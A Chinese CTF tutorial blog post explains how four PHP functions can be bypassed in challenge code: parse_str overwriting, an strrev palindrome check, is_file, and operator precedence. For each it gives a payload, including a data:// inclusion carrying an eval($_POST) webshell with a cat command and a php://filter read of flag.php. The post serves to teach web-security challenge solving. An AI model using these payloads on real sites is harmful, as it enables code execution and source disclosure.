CTF中的PHP特性函数解析之下篇
作者:XINO 发布时间:2023-06-14 09:54:52
前言
上篇文章讲的进阶一些的PHP特性不知道大家吸收的怎么样了,今天作为本PHP特性函数的最后一篇,我也会重点介绍一些有趣的PHP特性以及利用方法,下面开始我们今天的内容分享。
parse_str
parse_str()这个函数会把查询字符串解析到变量中。那么我们如何利用它的特性呢,我们看下面的例子:
<?php
highlight_file(__FILE__);
error_reporting(0);
include("flag.php");
if(isset($_POST['v1'])){
$v1 = $_POST['v1'];
$v3 = $_GET['v3'];
parse_str($v1,$v2);
if($v2['flag']==md5($v3)){
echo $flag;
}
} ?>
分析一下代码要求我们什么,看最后要我们数组v2等于md5(v3),而根据上面代码v2则是由该函数经过v1后赋值给的,那我们解题的思路就有了,利用parse_str() 函数的特点将v2[flag]的值覆盖,那么具体要怎样做呢?
先对数字5进行md5加密:
<?php
$b=md5('5');
echo $b;// e4da3b7fbbce2345d7772b0674a318d5
?>
之后再从v1传入我们的值即可完成绕过:
Payload:
GET:v3=5
POST: v1=flag=e4da3b7fbbce2345d7772b0674a318d5
strrev
这个函数还是很好理解的,就是将字符串进行翻转,曾经遇到过考察这个的题目觉得很有趣分享给大家,我们先看代码:
highlight_file(__FILE__);
$file = $_POST['file'];
if(isset($file)){
if(strrev($file)==$file){
include $file;
}
代码很简单,第一个是高亮代码没有什么用,要我们传入file而且要使回文数等于它本身并且还要考虑如何进行攻击,是不是不太好想,这里使用php里面的data协议,该协议可以进行写入数据,而且?>闭合后可以加任意字符不会受别的影响。于是我们构造代码:
data://text/plain,<?php eval($_POST[1]);?>>?;)]1[TSOP_$(lave php?<,nialp/txet//:atad&1=echo `cat /f1agaaa`;
可以看到思路还是挺巧妙的。
is_file
该函数检测是不是一个常规的文件类型,在CTF中也出过绕过这个函数的题目,下面我们先看看代码:
<?php
highlight_file(__FILE__);
error_reporting(0);
function filter($file){
if(preg_match('/../|http|https|data|input|rot13|base64|string/i',$file)){
die("hacker!");
}else{
return $file;
}
}
$file=$_GET['file'];
if(! is_file($file)){
highlight_file(filter($file));
}else{
echo "hacker!";
} ?>
分析一下filter函数过滤了很多关键字符串对我们的输入进行限制,最后还不能让is_file检测出来是文件,那我们要怎样读取flag.php文件呢,看最后有个高亮file的操作,这里就是利用点,我们要让其等于flag文件,于是需要绕过:
这里 根据特性is_file不会识别php伪协议,于是我们构造下面代码:
php://filter/read=convert.quoted-printable-encode/resource=flag.php
这样传入即可绕过检测。
优先级问题
在php里存在以下优先级特性:
&&与||的优先级高于=,而&&优先级高于||
=的优先级高于and与or
这里也可以作为考点来考,我们看下面代码:
<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['username']) && isset($_GET['password']) && isset($_GET['code'])){
$username = (String)$_GET['username'];
$password = (String)$_GET['password'];
$code = (String)$_GET['code'];
if($code === mt_rand(1,0x36D) && $password === $flag || $username ==="admin"){
if($code == 'admin'){
echo $flag;
}
}
}
我们需要传入三个参数,之后进行类型的强制转换,再通过判断语句,最后需要code参数等于admin方可解题,根据优先级原则,所以当第一个判断条件为true时,直接跳过第二个条件然后判断第三个条件,可能有一些绕,只要username=admin为真值,code=admin输出flag,于是构造payload:
?code=admin&password=1&username=admin
来源:https://juejin.cn/post/7177373916879388731
猜你喜欢
- 阅读上一篇教程:WEB2.0网页制作标准教程(8)CSS布局入门接下来开始要真正设计布局了。和传统的方法一样,你首先要在脑海里有大致的轮廓构
- 桥接模式(Bridge Pattern)是什么桥接模式是一种结构型模式,它将抽象部分与实现部分分离开来,使它们可以独立地变化。在桥接模式中,
- asp分页,是学习使用asp编程经常遇到的问题,也算是一个经典的问题。本文介绍了一个asp分页源代码例子,希望对初学者有所帮助,本程序文件名
- 这个代码不是很完善,能实现基本的功能;另外有个问题,就是divOpenWin层的定位问题:发现如果其属性设置成display:none,那么
- 这篇文章主要是把ASP代码变成组件,开发者不仅是加快了ASP的速度,而且也能保护加密自己的代码,编译asp代码为dll组件我想这个是最好的保
- 本XML系列教程将分三部分发布,到最后一期我们将拥有一个功能全面,更加友好的XML菜单。本教程这个第一期涉及到了一些XML的基础知识。大家都
- asp取得字段属性代码:set AdoX = server.createobject("adox.c
- 如何显示数据库中的图片和超级链接?代码见下:<% set conn=server.creatobject(&quo
- sql server的备份与恢复(查询分析器) 查询分析器: 命令: 1:备份数据库命令: backup database whdb1(要备
- 虽然今年名义上已经不再管人了,但也不得不掺和进很多人事,这里想简单说说,即使不能帮助这个行业的从业者规划职业道路,也算是把之前摸过的路小结一
- Oracle中有多种方法可以向数据库或服务器文件系统上载文件,这里主要介绍如下三种:Oracle HTTP Server(OHS)的mod_
- 一直在用JS写ASP,也不是特别原因,只是当初学的是JS,后来学ASP时知道ASP也可以用JS写,就没去学VBS.前几个月刚学ASP的时候找
- 一个动态载入asp树源码。把 node.htc, style.css 保存与 css 目录下. index.asp subtree.asp
- 事物绝非十全十美总有强差人意的一面,之前针对浮动分析了其引起文本重影的怪异问题,而作为浮动布局的最佳搭档定位布局也存在一定的缺陷。围绕着定位
- 文件名:Awa_temp.Class.asp 代码如下:<% 'Crazy蛙!模板操作类 '作者C
- asp生成html如果采用utf8编码方式,多数采用的是Adodb.Stream组件,因为fso并不能支持Utf-8最近在写一个生成HTML
- 常用Mysql查询语句记录一、授权1.授权本地用户对所有数据库具有所有权限> grant all privileges on
- 新浪天气预报代码,需要的朋友可以复制下面的代码到要显示的页面,新浪代码 :<IFRAME WIDTH='260
- 很简单的教程,献给喜欢SEO的朋友们。把article.asp?logID=26 替换成article.asp?/a
- (以下内容部分内容参考了http://adomas.org/javascript-mouse-wheel/ )之前js 仿Photoshop